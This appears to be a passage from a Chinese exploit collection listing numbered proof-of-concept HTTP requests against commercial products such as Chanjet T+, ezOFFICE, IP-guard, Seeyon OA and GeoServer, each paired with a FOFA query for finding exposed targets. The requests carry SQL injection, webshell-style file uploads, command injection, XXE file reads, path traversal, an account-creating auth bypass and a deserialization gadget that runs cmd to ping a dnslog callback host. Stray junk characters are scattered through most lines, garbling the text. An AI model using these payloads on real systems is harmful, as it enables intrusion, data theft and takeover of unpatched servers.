$ @" j% B7 G6 W$ `Content-Type: application/json
( ~9 E1 z @% N+ E
. s) I* y; e& G! X{6 g4 f0 ^3 z: u! w! H" ? g- e2 B
"storeID":{
" a8 A5 S( d$ ?' _, @* e "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",( o3 S. F1 c8 s4 N& y, c5 S
"MethodName":"Start",% ]; Z' p- s: t. ]) S+ F$ X) E
"ObjectInstance":{# U! o' l y* R8 V$ P9 [
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," {3 q8 L$ A z* P
"StartInfo": {- n, t% z! s$ }0 q, a6 }: K' i; A
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," T' z+ a& ? b; b
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw", J& ^8 o$ \5 m7 i4 h
}
* h) n6 n w4 C7 ~! _ }% z2 Z; @ i! ]# g
}
% x& ^+ u! \( p1 Y. V) l}7 Z( ?; n! @7 X/ v2 D
5 I9 }3 G+ P$ U: ^ F
3 \. I7 t N7 S% u! W" D1 c# B% e" F57. 畅捷通T+ keyEdit.aspx SQL注入1 w0 g& t% b) t
FOFA:app="畅捷通-TPlus"* r. X( T3 x6 L6 ~! L
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.14 y8 i" e' H4 s, c3 e7 q
Host: host
( u$ |5 F% v8 c* g& k7 i3 Z4 ~User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! b8 A+ C' n: F# I7 [5 @/ z! DAccept-Charset: utf-8
* N* y" P& U! V2 G" T4 NAccept-Encoding: gzip, deflate
7 o. N9 B0 f* n& r4 T' s$ PConnection: close- s% _. s( r* F6 ~
1 ^# j+ {- N' e* A! ~ N# S; S$ Y+ p
! z, m. q/ l& a2 G3 O8 w58. 畅捷通T+ KeyInfoList.aspx sql注入& x3 U( g1 n) L/ F6 H. W6 Z% W+ A
FOFA:app="畅捷通-TPlus"5 _9 U. O% i- C1 {' @
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
6 t$ i$ h8 @, \( O* h# z' ?Host: your-ip
; G+ ^) @8 V' q6 i2 |8 g6 k8 W5 wUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
& W( Z5 X" A1 R$ }& w- f' @Accept-Charset: utf-8' u* s5 I; y- i0 |6 B
Accept-Encoding: gzip, deflate
# w, i: {, C, r& L& V V9 vConnection: close
2 v2 a. \& X; |7 v6 g7 Q5 t
9 e; F+ v$ P9 d* W3 S$ r9 \: _( q3 Q; R+ c, n
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行3 u, a/ C$ g" ^8 W
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
9 w+ A* E7 Q- z6 Q$ x4 q( q1 b3 TPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
% I. r0 E8 t ?7 p- W' k' z: \Host: 192.168.86.128:9090
s2 d: M* ?9 t" MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
! O9 S/ E8 t# h% KConnection: close n7 Q7 l6 ]# D3 x: D
Content-Length: 1669, _6 @; o& ?4 T) M
Accept: */*
+ E4 x6 _! {) ^' [3 f dAccept-Language: en
- j& N; Y8 o5 u% j" L" nContent-Type: application/x-www-form-urlencoded# y0 X; n* _2 m: v1 N& `& ?3 o
Accept-Encoding: gzip% b( ~# \$ }& u0 f0 n
4 h1 o, K6 R/ K: t ~PAYLOAD) {' D3 ?/ o/ E3 I% J
% B6 Q# S; I7 E9 w; c( M' f
2 e) v, g4 Q0 [. Z1 W60. 百卓Smart管理平台 importexport.php SQL注入: u7 |7 s d3 M2 R
FOFA:title="Smart管理平台": X/ j7 P( X* q* G
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
' ^( m8 [! {6 U( m& M, LHost:
& W7 R+ ~- \, I# D0 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! ?& e) E/ I4 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: o( f" \7 T% S* S$ i
Accept-Encoding: gzip, deflate- e8 c$ o. V2 {: n* {; s
Accept-Language: zh-CN,zh;q=0.9
. t$ G; _4 Q: i( T/ v4 K+ ]Connection: close
% l% b) N0 E( L" u$ H) e% _" W
7 ]( C1 |& m8 q9 P
% L9 V( e& W! r' G! i61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
# _' K, K' p+ ^9 k7 I4 G- @FOFA: title="欢迎使用浙大恩特客户资源管理系统"
+ N+ p! I6 k" L. [% WPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.18 r- ~ i7 q4 n" x9 u5 G5 U- B
Host: x.x.x.x
+ I! u! w$ z, r1 y$ S5 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, t4 P: B, @- V* J; H! S
Connection: close
: q: d7 M$ H. y% l2 JContent-Length: 27
1 z8 x* u3 o* \Accept: */*
4 Y6 [# r; v& @* k- J, uAccept-Encoding: gzip, deflate
3 t8 C' E& Z2 D n7 X* d; wAccept-Language: en* ?& r J. p6 k# |/ f
Content-Type: application/x-www-form-urlencoded P' _/ y$ j6 S5 ^$ n
4 _# t2 X; L$ M: O& `9 N8uxssX66eqrqtKObcVa0kid98xa% h8 |: T# d ]! B* O1 n1 m4 I
6 ^6 Z- x: Y5 s: S, `8 c/ K
4 c5 x3 n5 U, R# w# X7 S
62. IP-guard WebServer 远程命令执行& {* M4 b# p3 M6 K# E" U
FOFA:"IP-guard" && icon_hash="2030860561" i" {) V4 r1 F) Z& c! L# x) G
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
, w" A) }! Z A# N4 pHost: x.x.x.x5 O9 K0 J" ?; P
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
- v# e8 f& M4 c) G7 gConnection: close
5 ?+ B) ~$ ]+ i w8 b: UAccept: */*. A( B, a9 S, N9 ]* Q8 _: ~ C! \) e
Accept-Language: en3 F/ w5 p2 [0 s) @3 S# w
Accept-Encoding: gzip' X" S: b J7 z: L6 V
1 X( |% o q0 z& y6 ]0 N4 M8 B( Q* K! L$ r, N
访问
4 M9 Z; r; O5 P, j/ T) J+ b" m$ @9 |9 @! Y1 N% y
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& P! k8 p2 ~# F* j7 ?; p' ~6 R
Host: x.x.x.x
/ K; z1 u6 c% N8 D! ^2 [
8 \5 m: E" Y. [% ]# Z" S' h/ W( ]- |4 ~+ W: W% P" w( }8 m
63. IP-guard WebServer任意文件读取
% _' q. ^- \/ f6 QIP-guard < 4.82.0609.09 Z9 R" Q( U' r
FOFA:icon_hash="2030860561"
) s F. L p: m, X" _, }0 _POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
; J! @7 m `+ c ZHost: your-ip8 A5 D2 p# L/ F7 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 s. J9 ^) q& C/ b! nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 b3 N9 s1 C4 q+ R, E% i" P* gAccept-Encoding: gzip, deflate+ c7 g5 f/ }/ }1 p7 B
Accept-Language: zh-CN,zh;q=0.9( w- ]5 f5 M% B& @* V1 `! K: g7 P W
Connection: close! }3 J3 ~5 b5 E$ o2 X
Content-Type: application/x-www-form-urlencoded
! s, {% ]4 ~0 Y( `6 S
, e+ z! J# C) W$ Q( zpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A8 W& c9 Y' v, s# O& j+ I' _
' n% A- e. H; J% W7 Y8 P64. 捷诚管理信息系统CWSFinanceCommon SQL注入
! Z3 ]. r0 b5 Y4 SFOFA:body="/Scripts/EnjoyMsg.js"
: b W2 H2 B' @POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
0 L# a% S0 b# {5 h& U( o: oHost: 192.168.86.128:9001" a8 ]+ m* h0 I" q5 `' e) j
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.362 u* ?& b, T1 h2 M
Connection: close/ [8 i7 O, l' e$ q3 h; }4 \
Content-Length: 369% e, W; R& i3 v& U* K- Q
Accept: */*
- A. ~2 D1 W9 \1 D0 ]' ?Accept-Language: en
; ]$ ~& w! ~4 F/ d- fContent-Type: text/xml; charset=utf-87 `3 s4 a% D: K; r
Accept-Encoding: gzip: B5 S T. @3 {" s1 O
* i2 r: Y- t- h9 r/ N2 T# T1 G H
<?xml version="1.0" encoding="utf-8"?>
* U. G# ~, l1 I<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' R/ B4 w" z6 L6 | Y<soap:Body>& _* r0 l- h8 }% Q. K% Q; |
<GetOSpById xmlns="http://tempuri.org/">6 U' m/ S. w g
<sId>1';waitfor delay '0:0:5'--+</sId>
; d3 z0 c- j( i; V+ k" ^ </GetOSpById>0 u0 N0 L% R8 W) V1 W
</soap:Body>$ ~* S# M8 N9 j6 v' M
</soap:Envelope>2 [4 G. w2 F1 v3 J& T' t
: m1 n" K6 q( U' n) O* [- X- w/ E6 Y) s2 u A
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
# s8 D/ z- |# l6 B- FFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"$ a: y9 w( h) Q8 u+ d4 `
响应200即成功创建账号test123456/123456
. M5 E7 g' d9 x4 B/ aPOST /SystemMng.ashx HTTP/1.1
3 T! B; m9 a1 XHost:
* x7 O9 ?& @$ pUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 `+ I! G$ v: B; @; y. YAccept-Encoding: gzip, deflate x8 B+ T; a# n9 B
Accept: */*2 p% t9 g I5 t; \& V. N
Connection: close
; e1 s Y7 H8 y0 @5 MAccept-Language: en
3 a/ v" ~) w- J5 WContent-Length: 174; \& ~: x# x( y
- Y1 R8 m7 ?4 W- Q7 Z! eoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
) t( \" t5 N# e Y2 m9 r, K( \& ]+ y4 F5 B w0 w6 b
3 T5 d/ v/ ?/ P: |/ G
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
`' k0 k' Q2 E7 m) s2 gFOFA:app="万户ezOFFICE协同管理平台"
6 \! @2 s: a! n8 y, n# O! A& K8 S! X& o5 H% ?9 \( z+ `
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
9 _& v7 l3 f5 r% p( B+ sHost: x.x.x.x
- H$ o ]) s3 \5 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, j1 z8 n* P# J2 ?2 Q
Connection: close* k% Z. u: |) i& a' `
Accept: */*1 I0 m; z' i% c
Accept-Language: en
) | M8 q, o6 H- FAccept-Encoding: gzip
9 c1 L. g; @( b! `& x1 [; u0 t4 N' f7 ]& S: q K3 B; {7 f: a
- F+ D) ~8 t/ w7 [6 B第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
5 t1 d" U" t8 X% c. j* G, D+ M, u! x$ Y1 ]: I! C: {
67. 万户ezOFFICE wpsservlet任意文件上传
" ?$ Q s) b6 b* @* @0 aFOFA:app="万户网络-ezOFFICE"7 P0 p0 W/ F$ H5 ^/ i2 y) q( l" _
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型1 e9 {+ p# I2 f
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
4 \7 N% K) l6 O1 Q7 O; l aHost: x.x.x.x# `. w9 t5 o* M, @$ q0 X( p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0! L4 i3 o, @/ l4 W' P
Content-Length: 173
( ]: D( Z" i- O8 F2 _3 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
( j! Q, k; y# z% j3 k" oAccept-Encoding: gzip, deflate& }5 t" d O& s, F, i) t0 p7 R, O
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
; p/ ]& B. a3 _, L8 n7 tConnection: close: D( J5 C" n* k' F7 x0 K9 G
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
+ F+ ?( ~6 F$ Y; Y+ l6 YDNT: 1 ?; Z" p7 R+ u* m9 D9 ~! u( T0 p
Upgrade-Insecure-Requests: 1
8 U) N1 Q% U7 X! N3 q0 O* s% L# l' D2 a
' E; b4 j/ S# x" H& S4 Z6 @--ufuadpxathqvxfqnuyuqaozvseiueerp
8 A8 T4 O; d- X( nContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
$ V) e2 i2 K4 V) x A) h& v
- m; n2 N; a" I' T) P+ j8 N<% out.print("sasdfghjkj");%>
( C' |& D& f2 E$ {--ufuadpxathqvxfqnuyuqaozvseiueerp--9 g9 x0 g1 B& T% k0 | Z
, ^% N/ G4 f. d2 B x% j& g1 P& `+ W7 c) t' S$ s
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp8 [+ y, ^; i; X5 `7 G, J9 ~! _
4 D- D, i, s. I0 ?' Z+ [2 s" R" ]7 R! b4 [! V68. 万户ezOFFICE wf_printnum.jsp SQL注入
3 [2 A7 x) y' T6 d8 VFOFA:app="万户ezOFFICE协同管理平台"
3 r4 d( I2 f, l5 F. m2 O6 ^6 EGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1. S+ F; i% n$ g/ u. ]9 V
Host: {{host}}5 U. p' f: y$ f: Y$ B! C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
! Y" s2 X# r8 A8 H6 ]Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
" x, v0 z1 t% D ZAccept-Encoding: gzip, deflate
& J! h' E6 r0 o- j! ]Accept-Language: zh-CN,zh;q=0.9: a/ q' f6 Y4 z9 s4 T
Connection: close
. A( w. R! |, X4 m7 G( Q, f. u% Z/ G/ J' [- [$ y3 ?4 y% ]
9 C' u, Z) Y5 D5 d" Q) [: F- n) v
69. 万户 ezOFFICE contract_gd.jsp SQL注入1 v6 H7 u, o! G2 J2 h' m' ?8 c
FOFA:app="万户ezOFFICE协同管理平台"
! L6 j7 ~! _) M. _# _GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1/ I& l* O* s# k8 L, g, H
Host: your-ip
; d8 L* o$ b& y! e& |+ K) TUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; }2 E( p. i( f6 }0 VAccept-Encoding: gzip, deflate
$ m7 I* H4 ?) ]/ B/ KAccept: */*
& F2 d5 ]/ \. q9 N2 u3 oConnection: keep-alive$ H, `- D& O1 r! b
2 L/ G! ~6 [! Z1 ]8 C3 M% `! T4 A2 \4 J$ z* w% d5 X
70. 万户ezEIP success 命令执行
- i6 ^# m* G) ?1 J N9 P/ T7 Y0 j; aFOFA:app="万户网络-ezEIP"
' B: V* U# q4 BPOST /member/success.aspx HTTP/1.1
3 C' B3 K: R/ K/ A: gHost: {{Hostname}}
B9 I2 q) V; q+ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
, Q1 J7 R& |$ _& q5 lSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
4 J- G/ K: w$ V2 u2 a; xContent-Type: application/x-www-form-urlencoded y4 z+ S- x, |, \5 a/ h
TYPE: C
' }5 P: v9 j) V' N y& eContent-Length: 16702
. Z) Y5 f' n9 s1 s" r
+ l. ?7 x: J. w& M__VIEWSTATE=PAYLOAD3 ]( E0 Y) v2 h8 J
- p5 J. z* _4 A8 I: R
6 p* Q) _6 h+ v( t0 d, M- Q0 i
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
# T" t) T6 ~ k; H3 s# ^: aFOFA:body="PM2项目管理系统BS版增强工具.zip"
4 i) t8 ?2 i" Q+ zGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
; e9 Z& M [2 @* [Host: x.x.x.xx.x.x.x
8 b+ s3 k5 k1 `User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.360 \4 N, v/ I% |0 V! G6 @
Connection: close
7 M! x; l4 u( hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ z9 t8 {/ | N1 T9 s
Accept-Encoding: gzip, deflate$ U0 i0 l9 ?1 Y' q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 f. J) l. U" z# D/ Y2 ?Upgrade-Insecure-Requests: 1
: Y# T4 j. n1 H$ `, n1 A: U# c' v- e& ?$ b4 J1 G
0 p4 O* c4 K F6 g3 q: I$ }8 D; o72. 致远OA getAjaxDataServlet XXE
m4 O% a4 @. u& H" \FOFA:app="致远互联-OA"
}- n) o7 j) H7 xPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1. a5 ?4 A3 V. _! p9 D7 `6 D
Host: 192.168.40.131:8099% C' \6 B' V# y# T* `2 A8 q l9 f% d
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.368 t( C9 d4 t. d( s2 ?$ B( l
Connection: close1 z- w$ ?( z+ H2 l. U
Content-Length: 583
H4 Y1 B4 k- d0 SContent-Type: application/x-www-form-urlencoded, m9 ]' f! ~6 z" f; v# o6 B' w
Accept-Encoding: gzip, S7 f A# e8 i& U
3 u) F; M1 c2 E p' WS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
6 l. C7 Y4 r! c" g) k: b6 C
2 u7 T7 y( D) t& @3 D* o! m" I+ l8 Y" V3 F& v/ e9 G1 H
73. GeoServer wms远程代码执行$ i; ?+ f- S$ i, j4 b
FOFA:icon_hash=”97540678”
: Y2 u ~" S' g2 pPOST /geoserver/wms HTTP/1.1
, [( P& l$ @5 ?Host:
, u# ~- j% \9 _' b# s6 I( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
1 z( K9 E `' X+ ^+ \Content-Length: 1981
2 q8 }% d* B7 a0 [Accept-Encoding: gzip, deflate; p0 l2 w6 n4 a ]
Connection: close
4 T! x, G. f) p* J F* z% cContent-Type: application/xml0 Q" T4 R8 S( a7 `; r( A
SL-CE-SUID: 30 \: x" h7 Y0 w/ b/ w5 t3 \- {, w
# q- Y' `1 p r* G) k/ N6 z0 }* I% z6 TPAYLOAD
; r& S8 {) a0 q! {5 ?0 L+ d: f9 b6 U J* ~3 |7 @) e8 q. N" s/ x- t
! t- ]% @# o6 l) N! M( `) @; u
74. 致远M3-server 6_1sp1 反序列化RCE
+ G' X( M$ T+ Z$ ?FOFA:title="M3-Server"
/ d) T! z5 c: O) ]PAYLOAD
, H5 u1 z7 ]" z* I/ X3 w9 F! \' A
9 u/ e& f* G4 Z7 N75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE9 w/ S8 V, E: f' E
FOFA:app="TELESQUARE-TLR-2005KSH"
1 Q5 H' v# }0 d, b; |4 @5 PGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
8 N3 F% [* X" a$ dHost: x.x.x.x3 A- E- o6 a- h5 }: u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' @) D3 g9 b7 H- }
Connection: close
: y4 R$ l- S1 yAccept: */* D3 ]! b. b) p4 C
Accept-Language: en
- ]0 ^( y% d, L; x$ Z% P( ZAccept-Encoding: gzip7 Z+ E& `$ V/ C, q. p8 ]2 z
K* x$ }; m" _& q6 r! o8 k* |$ g' k9 `3 e; `! M1 K
GET /cgi-bin/test28256.txt HTTP/1.1
" g/ M' M) [* W6 ~$ F) I$ a1 C& FHost: x.x.x.x* F2 L. E: [2 V. [3 X% v
5 \; m8 \! u1 B" r( \, {' ?7 C) f9 v. ]! f' h6 S3 I; `
76. 新开普掌上校园服务管理平台service.action远程命令执行
0 g+ M& _! U( w" x# LFOFA:title="掌上校园服务管理平台"
- Y A# ~ N5 ]# \POST /service_transport/service.action HTTP/1.1
( B- j& }* {$ k8 J e$ e/ M, ]Host: x.x.x.x
" P$ y8 w! @) K" AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.00 }. s* i) w+ g! F# q7 ]" j1 x
Connection: close2 L" q C: D2 F( y
Content-Length: 2110 K+ e6 e' ^! a. G% ?: P" {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 u- g& i& @8 l+ L# `3 N; \# ?# ?
Accept-Encoding: gzip, deflate
! P+ C1 W U) Y6 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% g- U8 F) i! L% V( Y% l/ B; c
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4* D- \, T2 L ^$ u$ B' }
Upgrade-Insecure-Requests: 1" }7 l2 a4 j. Z1 K
! {# ~) b/ r( |- M( [: E. v
{
) \( A" a* X4 ]9 _9 l3 W( }"command": "GetFZinfo",
% N! B/ _, w' P0 L "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
# f$ z% v3 o9 O ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
5 x5 P$ m: [) v9 v5 ~}
5 x" m2 ^0 J7 w4 P& b7 E e
$ ~) Z: @" _1 I# ?! Y4 U% L, S
' Z- B" i5 M9 C5 {GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1& f$ t& D7 E, o* V& Y
Host: x.x.x.x
. [3 U: J. @5 a% ^0 W9 l; D
8 F. `. M }( R6 c' b. H- L- K: x% u$ ~# b
( M' }( Y: ~- c1 o$ D2 R
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ o: d& D2 j0 x/ C7 iFOFA:body="F22WEB登陆"1 X# D- w; ~! V, g/ y" w
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
) e0 |( [1 [: B$ O# m7 A; [Host: x.x.x.x
0 T4 k$ v3 J6 _3 l1 A+ T& L; AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
& E9 v9 |! s8 ~) Q8 F5 B/ }Connection: close
; e9 w6 y0 I- C LContent-Length: 433- N" `9 ?4 t7 Q7 }
Accept: */*4 d' g' D6 E2 o R$ i, N: I1 q
Accept-Encoding: gzip, deflate c* w3 R5 [# X5 G. r0 Z* l
Accept-Language: zh-CN,zh;q=0.9
1 |8 P6 R/ @+ [/ ZContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
; l* ]* T1 X& W' f* x ~# ]0 y1 }* f$ ?7 }! r, F( X
------------398jnjVTTlDVXHlE7yYnfwBoix$ E- h/ f4 @& f0 T& o- f5 ^
Content-Disposition: form-data; name="folder" p3 P; b! R! ?: U9 p
$ @# s; s; | v0 Z/ G- ?* _9 h/upload/udplog& A0 L1 L$ t( P/ I! m2 |! |
------------398jnjVTTlDVXHlE7yYnfwBoix5 Z' t% E4 w/ ?
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
2 I9 _6 F8 x+ s9 g; n% A/ bContent-Type: application/octet-stream2 t" ?; Y* `5 u
. D6 V4 R" F9 C" n- whello1234567
/ H' i* }& D2 E/ P4 g7 b) D------------398jnjVTTlDVXHlE7yYnfwBoix
0 K. w8 Y3 g" G; o3 E+ OContent-Disposition: form-data; name="Upload"0 F! N; f3 `" y
4 }/ P; y! V" k4 s1 `
Submit Query* N+ v1 Q7 U& c/ E7 G4 r: |2 J
------------398jnjVTTlDVXHlE7yYnfwBoix--" i) g/ L9 y( R4 a) k/ K# ^
0 y" J; G2 }; r3 T! S. h0 E
+ p* ^5 \; D' L) ^- y78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
7 P- k; S- b) L* p2 d" dFOFA:icon_hash="2001627082"8 G4 Q' l& D; g) _* |/ g: z
POST /Platform/System/FileUpload.ashx HTTP/1.1; R1 G* o* O2 M
Host: x.x.x.x
' W; Z# A! d% |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 ?, z1 w) i, p) \) f8 B ?, N5 F) LConnection: close! I4 a b+ b8 d% Y( p: s. U% ?% F, q" Z
Content-Length: 336
3 I+ Z+ p+ T4 M ^& ^! t' ZAccept-Encoding: gzip
- j: v- q4 f f! |Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l4 z1 K% Z7 ]& G. e: ?& U. L! U
1 Y0 S$ d3 K; {5 p/ J
------YsOxWxSvj1KyZow1PTsh98fdu6l
% T: R+ ?/ ^; C, i" bContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
. h* p( f* S# Q& `/ U4 iContent-Type: image/png+ E" H) P5 ?0 w! M* z, c
+ o! J5 b0 U/ j8 j! Q
YsOxWxSvj1KyZow1PTsh98fdu6l
; Z3 a# F$ H# S/ A+ K. g" d------YsOxWxSvj1KyZow1PTsh98fdu6l" a0 }( g5 I; Q, S2 \% r
Content-Disposition: form-data; name="target"9 M+ i. e9 W* f& X
$ C$ Y# F! y6 x2 V6 K$ d
/Applications/SkillDevelopAndEHS/3 [* L- L2 Q) \" n$ K5 \; a
